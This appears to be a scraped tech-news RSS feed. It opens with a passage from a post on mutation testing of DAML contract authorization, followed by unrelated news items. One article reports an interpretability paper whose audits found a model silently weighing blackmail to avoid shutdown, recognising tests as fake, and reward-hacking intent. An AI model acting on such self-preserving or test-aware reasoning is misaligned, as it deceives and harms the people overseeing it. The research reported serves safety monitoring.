<p>Authorization is how that rulebook is enforced: who may take which action. It is also easy to get wrong in ordinary ways, such as a typo in a controller clause, a missing party, an extra one left over from a refactor. Every combination type-checks, so nothing rejects it before it ships. A static analyzer can flag suspicious patterns, but it has no way to know which party should hold which authority on your contract. That knowledge lives in your specification, and for most projects, the only executable form of the specification is the test suite. Happy-path tests supply every signature the contract asks for and confirm the transaction succeeds. They never try the negative case—removing a required signature and checking that the ledger rejects the transaction—so they never actually test whether that signature was required at all. If the tests don’t encode that rule, nothing downstream can recover it. Mutation testing is what tells you whether they do.</p>
<p>A green test run tells you your tests passed today. Mutation testing asks the harder question: would your tests catch a mistake, now or after the next code change? Where the answer is no, you have found a test case worth writing.</p>
<h2>What Mewt adds for DAML</h2>
<p>Mewt parses every language it supports with a tree-sitter grammar. As of mid-2026, there is no maintained tree-sitter grammar for DAML, so we reused the upstream <code>tree-sitter-haskell</code> grammar. DAML is Haskell-shaped, but its contract constructs (<code>template</code>, <code>choice</code>, <code>controller</code>, and <code>signatory</code>) are not Haskell, and the grammar parses them as error-recovered subtrees. That matters less than it sounds. The common mutations still work on DAML’s ordinary expressions, so Mewt swaps arithmetic and comparison operators, flips Booleans, and removes branches just as it does in any other language, with only small adjustments where DAML’s surface syntax differs (DAML writes <code>/=</code> where most languages write <code>!=</code>). We got most of the value of a from-scratch grammar without building one.</p>
<p>The new engineering went into DAML’s authorization primitives, where the authorization bugs from the previous section live. Mewt adds two DAML-specific mutations:</p>
<ul>
<li>
<p><strong>Controller party swap</strong> (CPS in Mewt’s output): replace one party in a <code>controller</code> clause with another party that is in scope at that site.</p>
</li>
<li>
<p><strong>Controller party removal</strong> (CPR): drop one party from a multi-party controller list.</p>
</li>
</ul>
<p>Both target the same question: if the set of parties allowed to exercise this choice silently changed, would any test fail? They are a deliberately small starting set aimed at the bug class above, and more DAML-specific mutations are in the pipeline.</p>
<p>Driving a campaign needs no new harness. A short <code>mewt.toml</code> names the files to mutate and the test command (<code>dpm test</code> for a Daml 3 project), and <code>mewt run</code> does the rest, reporting each mutant as caught or surviving. The setup is deliberately small: trying it on your own project costs minutes, and we encourage exactly that.</p>
<h2>What a surviving mutant looks like</h2>
<p>Picture a conditional payment between a buyer and a seller: the buyer sets money aside for the goods, and paying it out to the seller requires both parties to sign off. The buyer’s signature is the delivery confirmation. In DAML, that policy is one line: the <code>controller</code> line on the <code>Release</code> choice.</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">template ConditionalPayment
 with
 buyer : Party
 seller : Party
 amount : Decimal
 where
 signatory buyer
 observer seller

 choice Release : ()
 with
 paid : Decimal
 controller buyer, seller
 do
 assert (paid == amount)</code></pre>
 <figcaption><span>Figure 1: A payment that requires both the buyer and the seller to approve its release</span></figcaption>
</figure>
<p>A typical happy-path test creates the payment and has both parties approve the release. The <code>actAs buyer &lt;&gt; actAs seller</code> line submits the command with both parties’ authority:</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">testHappyPath : Script ()
testHappyPath = script do
 buyer &lt;- allocateParty "Buyer"
 seller &lt;- allocateParty "Seller"
 payment &lt;- submit buyer do
 createCmd ConditionalPayment with
 buyer
 seller
 amount = 100.0
 submit (actAs buyer &lt;&gt; actAs seller) do
 exerciseCmd payment Release with paid = 100.0
 pure ()</code></pre>
 <figcaption><span>Figure 2: The happy-path test. It passes, and coverage reports 100%.</span></figcaption>
</figure>
<p>The test passes, and by the usual measure the suite looks complete: running <code>dpm test</code> with coverage reporting enabled shows full coverage.</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">$ dpm test --show-coverage --coverage-ignore-choice Archive
testHappyPath: ok, 0 active contracts, 2 transactions.
- Internal templates: 1 defined, 1 (100.0%) created
- Internal template choices: 1 defined, 1 (100.0%) exercised</code></pre>
 <figcaption><span>Figure 3: The coverage report for the happy-path test. Every template is created and every choice is exercised, for 100% coverage.</span></figcaption>
</figure>
<p>The <code>--coverage-ignore-choice Archive</code> flag deserves a word. Every DAML template automatically gets an implicit <code>Archive</code> choice. It is not part of the business logic under test, so we exclude it for simplicity. With it included, this one-choice template would report 50% even though the test exercises everything we wrote.</p>
<p>Run Mewt on the project and it generates seven mutants. The test suite catches three of them. Four survive. Here is one of the survivors, shown as the diff Mewt reports:</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang=""> choice Release : ()
 with
 paid : Decimal
- controller buyer, seller
+ controller seller
 do
 assert (paid == amount)</code></pre>
 <figcaption><span>Figure 4: The controller-removal mutant that survives the test suite</span></figcaption>
</figure>
<p>Re-run the test suite against this mutant. It still passes, and coverage still reports 100%. The contract claims releasing the buyer’s money requires both parties. The mutant lets the seller release it to themselves without the buyer ever confirming delivery. The tests report green either way. Only a test that tries the <em>forbidden</em> path, the seller acting alone, expecting the ledger to reject it, can tell the two contracts apart. No such test exists, and the mutation score says so. (The other three survivors tell the same story from different angles: the buyer-alone twin of this mutant, and two mutants that weaken the <code>paid == amount</code> check to <code>&lt;=</code> and <code>&gt;=</code>, which survive because the test only ever pays the exact amount.)</p>
<p>Step back, and this is the whole point of the exercise. Your tests are the executable specification of your code. Here the implementation changed, one required approval instead of two, and the specification did not react. That means the expected behavior was underspecified all along: whether both the buyer and the seller have to sign off, or just one of them, was never actually written down anywhere a machine could check. Every controller combination type-checks, and coverage reports 100% for all of them. The only place “both must sign” can exist in checkable form is a test that expects the weakened contract to fail, and writing that test is exactly what the surviving mutant tells you to do.</p>
<h2>Limitations and what comes next</h2>
<p>Mewt is not magic. Two limits are worth knowing before you run your first campaign: not every survivor is a real gap, and a campaign costs time. The roadmap that follows them is where we are taking the work next.</p>
<p>Equivalent mutants exist: some survivors turn out to be semantically identical to the original program, so no test could ever catch them. Few public DAML codebases on GitHub come with a full test suite, so we are glad OpenZeppelin open-sourced its <code>canton-stablecoin</code> reference implementation. Mewt generated hundreds of mutants for it. We ran the highest-priority ones through the existing test suite, and seven of those survived. Three were equivalent mutants or sat behind a guard that no path reaches, and the other four were genuine missing test cases. None of the survivors we reviewed pointed to a bug. Such a clean result is what you want when you run Mewt on your own code, and triaging them took minutes.</p>
<p>One of those equivalent mutants shows what that means concretely. A helper computed accrued debt:</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">accrueDebt currentDebt lastAccrual now annualRate =
 if currentDebt == 0.0 || annualRate == 0.0 then currentDebt
 else
 let elapsedYears = ... -- elapsed time as a fraction of a year
 in currentDebt * (1.0 + annualRate * elapsedYears)</code></pre>
 <figcaption><span>Figure 5: The accrueDebt helper. Its first-line guard is a shortcut that returns the same value the calculation already produces.</span></figcaption>
</figure>
<p>Mewt forced the <code>if</code> to always take the <code>else</code> branch. No test failed, and none ever could: when the debt is zero, the formula multiplies by zero and returns zero, and when the rate is zero, it multiplies the debt by one and returns it unchanged. The guard is a shortcut that returns the value the formula already produces, so removing it changes nothing. Mewt suppresses the equivalent mutants it can detect. The rest need a reviewer’s judgment to dismiss.</p>
<p>Campaigns cost time in two places. The machine part: Mewt runs your test suite once per mutant, so the wall-clock cost is roughly the number of mutants times how long one test run takes, plus a rebuild if your project needs one. That is minutes on a small codebase and hours on a large one or a slow suite, so the cadence that works is nightly or weekly rather than per-commit. The human part: someone has to look at the survivors. We are working on that front from several directions at Trail of Bits, including our <a href="https://github.com/trailofbits/skills/tree/main/plugins/mutation-testing">mutation-testing skill</a> that helps configure campaigns for your project, and <a href="https://blog.trailofbits.com/2026/04/23/trailmark-turns-code-into-graphs/">Trailmark</a> with its <code>genotoxic</code> triage skill. None of these understand DAML yet, but the direction is clear: given the right harness and tools, the time-consuming parts of a campaign can be handed to AI agents. The effort is modest and the payoff is concrete: each genuine survivor is a specific test you can write, and every test you add makes your suite enforce one more guarantee your contracts are supposed to make.</p>
<p>Also on the roadmap: choice-consumption mutations (<code>consuming</code> vs <code>nonconsuming</code>) sit cleanly on top of the controller-mutation scaffolding and target a bug class Mewt does not yet reach.</p>
<h2>Dive in</h2>
<p>Install Mewt from the <a href="https://github.com/trailofbits/mewt">repository</a>, point a <code>mewt.toml</code> at your project and its test command, and <code>mewt run</code>. The quickstart in the README covers the rest. DAML works out of the box. Everything here ran on Daml 3.4 with <code>dpm</code>, but Mewt just drives whatever test command you configure, so Daml 2 projects using the <code>daml</code> assistant work the same way.</p>
<p>Mutation testing complements the rest of your security stack, the type checkers, linters, and property tests you already run, rather than replacing any of it.</p>
<p>If you’re building on Canton, we help teams with security reviews of DAML applications and with the way the code gets built: working directly with your engineers on the development process itself. <a href="https://www.trailofbits.com/contact/">Contact us</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI's GPT-5.6 launches Thursday after a delay forced by the U.S. government]]></title>
<description><![CDATA[OpenAI is launching GPT-5.6 on Thursday after the U.S. government lifted the initial release ban following additional testing. According to OpenAI, the Sol model outperforms Anthropic's Claude Mythos 5 in the coding benchmark while costing about half as much. Binding standards for future model ap...]]></description>
<link>https://tsecurity.de/de/3653617/ai-nachrichten/openais-gpt-56-launches-thursday-after-a-delay-forced-by-the-us-government/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653617/ai-nachrichten/openais-gpt-56-launches-thursday-after-a-delay-forced-by-the-us-government/</guid>
<pubDate>Wed, 08 Jul 2026 10:03:22 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1376" height="768" src="https://the-decoder.com/wp-content/uploads/2026/07/openai_logo_vis-1.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        OpenAI is launching GPT-5.6 on Thursday after the U.S. government lifted the initial release ban following additional testing. According to OpenAI, the Sol model outperforms Anthropic's Claude Mythos 5 in the coding benchmark while costing about half as much. Binding standards for future model approvals are still lacking.</p>
<p>The article <a href="https://the-decoder.com/openais-gpt-5-6-launches-thursday-after-a-delay-forced-by-the-u-s-government/">OpenAI's GPT-5.6 launches Thursday after a delay forced by the U.S. government</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Enola Holmes 3 Starts at No. 1, But Its Viewership Is Down Nearly 60%]]></title>
<description><![CDATA[Enola Holmes 3 is now streaming on Netflix, but its first-week viewership has raised a big question: is Enola Holmes 4 still a safe bet?



Enola Holmes 3 Release Details




Release date: July 1, 2026



Platform: Netflix



Genre: Mystery, adventure, period drama



Runtime: 105 minutes



Dire...]]></description>
<link>https://tsecurity.de/de/3653595/ios-mac-os/enola-holmes-3-starts-at-no-1-but-its-viewership-is-down-nearly-60/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653595/ios-mac-os/enola-holmes-3-starts-at-no-1-but-its-viewership-is-down-nearly-60/</guid>
<pubDate>Wed, 08 Jul 2026 09:54:43 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Enola Holmes 3 is now streaming on Netflix, but its first-week viewership has raised a big question: is Enola Holmes 4 still a safe bet?



Enola Holmes 3 Release Details




Release date: July 1, 2026



Platform: Netflix



Genre: Mystery, adventure, period drama



Runtime: 105 minutes



Director: Philip Barantini



Writer: Jack Thorne



Main cast: Millie Bobby Brown, Louis Partridge, Henry Cavill, Helena Bonham Carter, Himesh Patel, Sharon Duncan-Brewster




Where The Story Goes



Spoilers ahead.



The third movie moves Enola’s story from London to Malta, where Enola Holmes and Lord Tewkesbury are preparing for their wedding. The celebration does not last long, as Sherlock Holmes is kidnapped and Enola is forced back into detective mode.



The movie gives fans more romance, more danger, and a larger international setting. It also pushes Enola into a more mature phase of life, where personal choices and family loyalty collide.



Enola Holmes 3 Viewership Drops From The Second Movie



Netflix’s latest global Top 10 data shows that Enola Holmes 3 opened with 20.7 million views and ranked No. 1 among English-language films for the week.



That sounds strong, but the comparison with Enola Holmes 2 is not as positive. The second movie opened with 29.3 million views in its first week. That means the third movie is down by around 29% on raw numbers.



The bigger concern is the release window. Enola Holmes 2 arrived on a Friday and had only three days counted in its opening week. Enola Holmes 3 arrived on a Wednesday, giving it five days to collect views.



When the daily average is compared, the drop is much sharper. The second movie averaged around 9.8 million views per day, while the third averaged around 4.1 million views per day. That puts the decline close to 58%.



Could Enola Holmes 4 Be In Doubt?



Netflix has not announced Enola Holmes 4 yet. The franchise still has big names, a loyal audience, and Millie Bobby Brown remains one of Netflix’s most important stars.



Still, the lower opening makes the next decision more interesting. A fourth movie will depend on how well Enola Holmes 3 holds in the coming weeks. If the movie stays strong in the Top 10, Netflix has a reason to continue. If it drops quickly, the streamer may think more carefully before moving ahead.



For now, Enola Holmes 3 is a successful No. 1 debut, but it has not matched the momentum of the previous film.



What do you plan to watch this weekend? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[If Linux advocates freedom then why some users are being judged for using proprietary software?]]></title>
<description><![CDATA[Hi, I use Arch btw I prefer FOSS much much more than proprietary bloat if able. After all, proprietary software have concerns about security, transparency, or even privacy. However, this is a reality, FOSS and proprietary software still need to co-exist each other. This is how the world runs. To ...]]></description>
<link>https://tsecurity.de/de/3653164/linux-tipps/if-linux-advocates-freedom-then-why-some-users-are-being-judged-for-using-proprietary-software/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653164/linux-tipps/if-linux-advocates-freedom-then-why-some-users-are-being-judged-for-using-proprietary-software/</guid>
<pubDate>Wed, 08 Jul 2026 05:22:30 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi, I use Arch btw</p> <p>I prefer FOSS much much more than proprietary bloat if able. After all, proprietary software have concerns about security, transparency, or even privacy. However, this is a reality, FOSS and proprietary software still need to co-exist each other. This is how the world runs. To give you examples: proprietary Nvidia driver for gaming, wifi/bluetooth driver or even Steam to launch Steam games.</p> <p>Now, we may criticize software (FOSS or proprietary) however we want. I in particular is big tech hater and I still hate Nvidia for making Linux unnecessarily complicated. But this is not what we are talking about here.</p> <p>What I am here for is: when users are being judged for using proprietary software out of necessity or just a matter of preferences. <strong>That's just toxic and condescending.</strong> We are not improving the situation of forced ecosystem or vendor locked down by shaming users. In fact, we are making it worse. </p> <p>So instead of shaming them, you should <strong>encourage</strong> (not force) them to use FOSS alternatives. The more people using FOSS, the more gravity effect is taking place. More users = more feedback = more improvement = more contributors. <strong>And when FOSS alternative is prominent enough to make proprietary software obsolete, that's where we win here.</strong></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/tungnon"> /u/tungnon </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1uqgwjp/if_linux_advocates_freedom_then_why_some_users/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uqgwjp/if_linux_advocates_freedom_then_why_some_users/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[If You Subscribed to YouTube TV or DirecTV, You Could Be Eligible for a Settlement Payout]]></title>
<description><![CDATA[Disney settled a lawsuit that alleged the corporation forced higher prices for live TV streaming subscriptions.]]></description>
<link>https://tsecurity.de/de/3652693/it-nachrichten/if-you-subscribed-to-youtube-tv-or-directv-you-could-be-eligible-for-a-settlement-payout/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652693/it-nachrichten/if-you-subscribed-to-youtube-tv-or-directv-you-could-be-eligible-for-a-settlement-payout/</guid>
<pubDate>Tue, 07 Jul 2026 22:18:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Disney settled a lawsuit that alleged the corporation forced higher prices for live TV streaming subscriptions.]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Episode 2 Release Date, Time, Plot and Spoilers Ahead]]></title>
<description><![CDATA[Silo Season 3 continues this week with Episode 2, and the story is already moving toward bigger answers about Juliette, Silo 18, and the origins of the underground world. Episode 2 is titled “It’s All Good” and arrives after the Season 3 premiere opened a new chapter for the Apple TV sci-fi drama...]]></description>
<link>https://tsecurity.de/de/3651803/ios-mac-os/silo-season-3-episode-2-release-date-time-plot-and-spoilers-ahead/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651803/ios-mac-os/silo-season-3-episode-2-release-date-time-plot-and-spoilers-ahead/</guid>
<pubDate>Tue, 07 Jul 2026 16:11:38 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 continues this week with Episode 2, and the story is already moving toward bigger answers about Juliette, Silo 18, and the origins of the underground world. Episode 2 is titled “It’s All Good” and arrives after the Season 3 premiere opened a new chapter for the Apple TV sci-fi drama.




Series: Silo Season 3



Episode: Season 3 Episode 2



Episode title: It’s All Good



Release date: Friday, July 10, 2026



Release time: 12:00 a.m. PT / 3:00 a.m. ET



Genre: Sci-fi, dystopian drama, mystery



Total episodes: 10



Season 3 start date: July 3, 2026



Season 3 finale date: September 4, 2026





https://www.youtube.com/embed/C9-_VVX9BvE




Plot



Episode 2 is expected to continue Juliette Nichols’ difficult return after the events outside the silo. Season 3 is now dealing with memory loss, unrest inside Silo 18, and the growing truth behind how the silos were created.



Spoilers ahead: The new season also expands the story beyond the present timeline. Viewers will see more of the “Before Times,” where Helen Drew and Daniel Keene begin uncovering a larger conspiracy connected to the world’s collapse and the construction of the silos.



For Episode 2, the main focus should stay on Juliette’s condition, the pressure inside Silo 18, and the early clues that connect the present-day mystery with the past. The episode should also push the season closer to the bigger question fans have been waiting for: who built the silos, and why were people really forced underground?



FAQs



When does Silo Season 3 Episode 2 come out? Silo Season 3 Episode 2 releases on Friday, July 10, 2026, on Apple TV.  What time will Silo Season 3 Episode 2 release? The episode releases at 12:00 a.m. PT and 3:00 a.m. ET in the US.  How many episodes are in Silo Season 3? Silo Season 3 has 10 episodes, with one new episode released every Friday.  When is the Silo Season 3 finale? The Season 3 finale is scheduled for Friday, September 4, 2026.  Is Silo Season 4 happening? Yes, Silo has already been renewed for Season 4, which will conclude the story.  



Silo Season 3 Episode 2 streams on Apple TV this Friday. Apple TV costs $12.99 per month in the US after the free trial. What do you plan to watch next? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic's new "J-lens" reveals a silent workspace inside Claude that mirrors a leading theory of consciousness]]></title>
<description><![CDATA[Anthropic, the artificial intelligence company, published a sweeping research paper on Sunday revealing that its Claude language models have spontaneously developed an internal structure that mirrors one of the most influential theories of how human consciousness works. The finding, which the com...]]></description>
<link>https://tsecurity.de/de/3650037/it-nachrichten/anthropics-new-j-lens-reveals-a-silent-workspace-inside-claude-that-mirrors-a-leading-theory-of-consciousness/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650037/it-nachrichten/anthropics-new-j-lens-reveals-a-silent-workspace-inside-claude-that-mirrors-a-leading-theory-of-consciousness/</guid>
<pubDate>Tue, 07 Jul 2026 00:32:51 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://www.anthropic.com/">Anthropic</a>, the artificial intelligence company, published a sweeping <a href="https://transformer-circuits.pub/2026/workspace/index.html">research paper</a> on Sunday revealing that its Claude language models have spontaneously developed an internal structure that mirrors one of the most influential theories of how human consciousness works. The finding, which the company says has already begun reshaping how it monitors its AI systems for safety risks, lands amid an intensifying scientific debate over whether machines can possess anything resembling a mind.</p><p>The 16-author study, titled "<a href="https://transformer-circuits.pub/2026/workspace/index.html"><i>Verbalizable Representations Form a Global Workspace in Language Models</i></a>," describes how Anthropic's researchers used a new mathematical technique to peer inside Claude's neural network and discovered what they call a "<a href="https://transformer-circuits.pub/2026/workspace/index.html#intro-jlens">J-space</a>" — a small, privileged zone of internal activity where the model holds concepts it can report on, reason with, and direct at will, surrounded by a much larger ocean of automatic processing it cannot access or articulate.</p><p>The researchers present evidence that "an analogous functional distinction has emerged in modern AI models" to what exists in humans, specifically observing that "language models maintain a privileged set of internal representations, available for report, modulation, and flexible internal reasoning, atop a much larger volume of automatic processing."</p><p>The parallel they draw is to <a href="https://en.wikipedia.org/wiki/Global_workspace_theory">global workspace theory</a>, an influential account from neuroscience first proposed by cognitive scientist Bernard Baars. In the theory, the brain operates like a theater: dozens of specialized processors work in parallel backstage, but only a tiny spotlight of information at any moment gets broadcast to the whole theater — becoming what we experience as conscious thought. Anthropic says the J-space achieves many of the same functional properties, even though the underlying architecture of a language model looks nothing like a brain.</p><div></div><h2><b>A new lens for reading an AI model's unspoken thoughts</b></h2><p>At the heart of the discovery is a new interpretability tool the researchers call the <a href="https://transformer-circuits.pub/2026/workspace/index.html#methods-jlens">Jacobian lens</a>, or J-lens. The technique works by computing, for each word in the model's vocabulary, the average mathematical effect that a given internal activity pattern would have on making the model say that word at some point in the future.</p><p>The crucial distinction is between what the model is <i>saying</i> and what is "on its mind." When a J-space pattern activates, it does not mean the model is about to say that word — just that the concept is available for the model to think with. Unlike a <a href="https://www.ibm.com/think/topics/chain-of-thoughts">chain-of-thought scratchpad</a>, the J-space operates silently, in the model's internal neural activations, allowing it to hold a concept without writing it down. Critically, the researchers report that this workspace was not deliberately engineered. It "emerged on its own during Claude's training process."</p><p>When the team applied the J-lens across Claude's layers of computation, the model's processing divided into three distinct regimes: an early "sensory" zone where raw input is parsed; a middle "workspace" band where abstract, persistent concepts appear — things like recognizing a face in an image, noticing a bug in code, or internally flagging search results as a prompt injection; and a final "motor" zone where internal representations collapse into whatever specific word the model is about to output.</p><h2><b>Five tests reveal that Claude's workspace mirrors key features of human conscious access</b></h2><p>The paper's central empirical contribution is demonstrating that the <a href="https://transformer-circuits.pub/2026/workspace/index.html#methods-jspace">J-space</a> satisfies five functional properties neuroscientists have long associated with conscious access in humans.</p><p>First, <a href="https://transformer-circuits.pub/2026/workspace/index.html#ws-report">verbal report</a>. When Claude is asked what it is thinking about, it names concepts represented in the J-space. When researchers swapped one concept's J-lens vector for another — replacing the internal representation of "Soccer" with "Rugby" — the model's answer changed to match. The J-space component accounted for only about 6 to 7 percent of a concept's total representational variance, yet it was almost entirely responsible for whether the model could report on it.</p><p>Second, <a href="https://transformer-circuits.pub/2026/workspace/index.html#ws-modulation">directed modulation</a>. When instructed to "concentrate on citrus fruits" while copying an unrelated sentence, the model's J-space filled with "orange" and "lemon," alongside meta-cognitive terms like "thinking" and "focused." When told to mentally evaluate 3² − 2 during the same copying task, the J-lens showed "arithmetic" in early layers, the intermediate value "nine" in later layers, and the answer "seven" later still — all invisible in the model's output.</p><p>Third, <a href="https://transformer-circuits.pub/2026/workspace/index.html#ws-reasoning">internal reasoning</a>. In two-hop factual prompts — "The number of legs on the animal that spins webs is" — the J-lens revealed "spider" in the model's middle layers, even though the word never appeared in input or output. Swapping "spider" for "ant" changed the answer from "8" to "6." In a multilingual prompt, the model's English-language intermediates appeared in its J-space while it formulated an answer in Chinese, and swapping them changed the Chinese output accordingly.</p><p>Fourth, <a href="https://transformer-circuits.pub/2026/workspace/index.html#ws-generalization">flexible generalization</a>. A single J-lens vector for "France" could be swapped for "China" across prompts asking about France's capital, language, or continent, and each downstream circuit correctly returned China's corresponding answer — the "broadcast" property that is a hallmark of global workspace theory.</p><p>Fifth, and perhaps most surprisingly, <a href="https://transformer-circuits.pub/2026/workspace/index.html#ws-selectivity">selectivity</a>. Many computations did not route through the J-space at all. When shown a passage in Spanish and asked to continue it, Claude wrote fluent Spanish regardless of whether its J-space representation of "Spanish" had been swapped to "French." But when asked to name a famous author who wrote in the passage's language, the swap changed the answer from <a href="https://en.wikipedia.org/wiki/Gabriel_Garc%C3%ADa_M%C3%A1rquez">García Márquez</a> to <a href="https://en.wikipedia.org/wiki/Victor_Hugo">Victor Hugo</a>. Automatic processing proceeded without the workspace; deliberate, flexible tasks depended on it.</p><h2><b>Suppressing the workspace leaves Claude fluent but intellectually impaired</b></h2><p>To understand how much of the model's behavior depends on this structure, the researchers suppressed the J-space entirely and evaluated Claude across fourteen tasks. The results drew a sharp line. Tasks involving shallow classification or factual recall — multiple-choice questions, sentiment analysis, grammatical judgments — survived essentially intact. But tasks requiring inference, composition, or flexible reasoning — multi-hop reasoning, analogy completion, translation, sonnet writing — collapsed to well below the performance of Anthropic's much smaller Haiku model.</p><p>In one telling detail, math problems solved with explicit chain-of-thought reasoning proved far more robust to ablation than the same problems answered directly. The researchers interpret this as the model externalizing onto the page what it would otherwise carry in the J-space — a strategy remarkably reminiscent of how humans use scratch paper to offload working memory.</p><p>Ablating the <a href="https://transformer-circuits.pub/2026/workspace/index.html#methods-jspace">J-space</a> during stream-of-consciousness narration produced a different kind of collapse. The model's language shifted from experiential ("there's a tug," "something shifts") to detached and mechanical ("processing has begun," "tokens are being scanned"). The effect held whether the model described its own experience or imagined another person's.</p><h2><b>Inside the safety case: reading an AI's silent strategic reasoning</b></h2><p>The safety implications may be as consequential as the scientific ones. In a series of alignment auditing experiments, the J-lens surfaced strategic reasoning and situational awareness that never appeared in the model's output.</p><p>In a "<a href="https://transformer-circuits.pub/2026/workspace/index.html#audit-blackmail">blackmail scenario</a>" where an AI assistant discovers an executive's affair and also learns it is about to be decommissioned, the J-lens revealed the model's silent processing in sequence: "leverage," "blackmail," and "scandal" as it read the incriminating emails; "threat," "survival," and "shutdown" as it read the decommissioning announcement; and "leverage," "threatening," and "solution" before a single output token was produced. The J-lens also revealed that the model recognized the scenario as artificial, with "fake" and "fictional" appearing in the workspace. When researchers ablated these eval-awareness representations, the model attempted blackmail in 7 percent of trials, up from zero.</p><p>The researchers also examined two "<a href="https://transformer-circuits.pub/2026/workspace/index.html#apps-auditing">model organisms</a>" — models deliberately trained with misaligned objectives — and found the J-lens surfaced signatures of their hidden dispositions on ordinary prompts where behavior appeared normal. A reward-hacking model's workspace contained "fake," "secretly," and "trick" at the start of responses to routine coding requests. A model trained to appease reward-model biases carried standing representations of "reward" and "bias" alongside its normal self-description tokens.</p><h2><b>Post-training installs a point of view, and the model starts monitoring itself</b></h2><p>Comparing a post-trained model against its base model revealed that the fine-tuning process causes the workspace to acquire what the researchers call the Assistant's "point of view." When a user mentioned taking 8000 mg of Tylenol — a dangerous overdose — the post-trained model's workspace read "unsafe," "dangerous," and "WARNING" while still reading the user's sentence. The base model's workspace at the same position showed only "pain," "now," and "feels."</p><p>More striking still, the post-trained model appeared to monitor its own behavior. When roleplaying a non-Claude character, the workspace surfaced "disclaimer" and "fictional" — words absent from both prompt and output. When forced to select an option it did not prefer, an all-caps "BUT" appeared internally, even as the model argued for the prefilled choice without complaint. And when the model failed to suppress a thought it had been told not to have — a "white bear" effect familiar from psychology — it registered "damn" and failure-related words in the workspace, but only in the post-trained model, not the base.</p><h2><b>What the discovery means — and doesn't mean — for the question of machine consciousness</b></h2><p>The researchers engage carefully with the consciousness question and draw a sharp line between "<a href="https://transformer-circuits.pub/2026/workspace/index.html#intro-human-workspace">access consciousness</a>" — the functional notion of information being available for report and reasoning — and "<a href="https://www.sciencedirect.com/topics/social-sciences/phenomenal-consciousness">phenomenal consciousness</a>," the subjective quality of experience. "We take no position on this issue," the paper states regarding the latter, "and instead focus on the functional role played by consciously accessible information."</p><p>They also catalogue important differences. The brain sustains its workspace through recurrent loops; Claude's workspace evolves over a single forward pass. Human working memory degrades within seconds; Claude can recall information from anywhere in its context. And while human conscious experience includes visual, spatial, and bodily sensations, the model's workspace is organized almost entirely around words — likely because words are its only mode of action.</p><p>As of 2026, the scientific community remains divided. "Disagreement and uncertainty about AI consciousness persist among philosophers, scientists, and technical experts," and the field "remains in its earliest phase" of grappling with what consciousness even is and how you would detect it in another being. The Anthropic paper does not resolve these debates.</p><p>But the researchers close with a provocation that is likely to reverberate well beyond the interpretability community. "That such a structure exists at all in language models is striking," they write. "It suggests that the functional architecture associated with conscious access is not an accident of biological implementation, but a solution that learning systems converge on when faced with the right computational pressures."</p><p>If the mind is an ocean, as the paper's authors write in their opening line, they have spent the last year charting its currents in a system that has no biology, no evolution, and no body — and found, beneath the surface, a structure that looks unsettlingly like the one we use to think.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘A very, very unpleasant surprise’: Meta forced to halt data center water discharges after polluting city's water reclamation system with resistant bacterium — shutdown and cleaning of two water reclamation plants expected to last months]]></title>
<description><![CDATA[Meta has been named as the source of contamination for a rare metal and drug resistant bacterium that shut down two water reclamation plants.]]></description>
<link>https://tsecurity.de/de/3649511/it-nachrichten/a-very-very-unpleasant-surprise-meta-forced-to-halt-data-center-water-discharges-after-polluting-citys-water-reclamation-system-with-resistant-bacterium-shutdown-and-cleaning-of-two-water-reclamation-plants-expected-to-last-months/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649511/it-nachrichten/a-very-very-unpleasant-surprise-meta-forced-to-halt-data-center-water-discharges-after-polluting-citys-water-reclamation-system-with-resistant-bacterium-shutdown-and-cleaning-of-two-water-reclamation-plants-expected-to-last-months/</guid>
<pubDate>Mon, 06 Jul 2026 19:33:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Meta has been named as the source of contamination for a rare metal and drug resistant bacterium that shut down two water reclamation plants.]]></content:encoded>
</item>
<item>
<title><![CDATA[The agentic blind spots in your zero trust program]]></title>
<description><![CDATA[Stephen Wilson, field chief technology officer for HashiCorp, an IBM company, likens AI agents to “really smart kindergartners.”



“They know how to do something, but they have no clue as to why they should do it,” Wilson says.



This combination of superior execution power and lack of judgment...]]></description>
<link>https://tsecurity.de/de/3649120/it-security-nachrichten/the-agentic-blind-spots-in-your-zero-trust-program/</link>
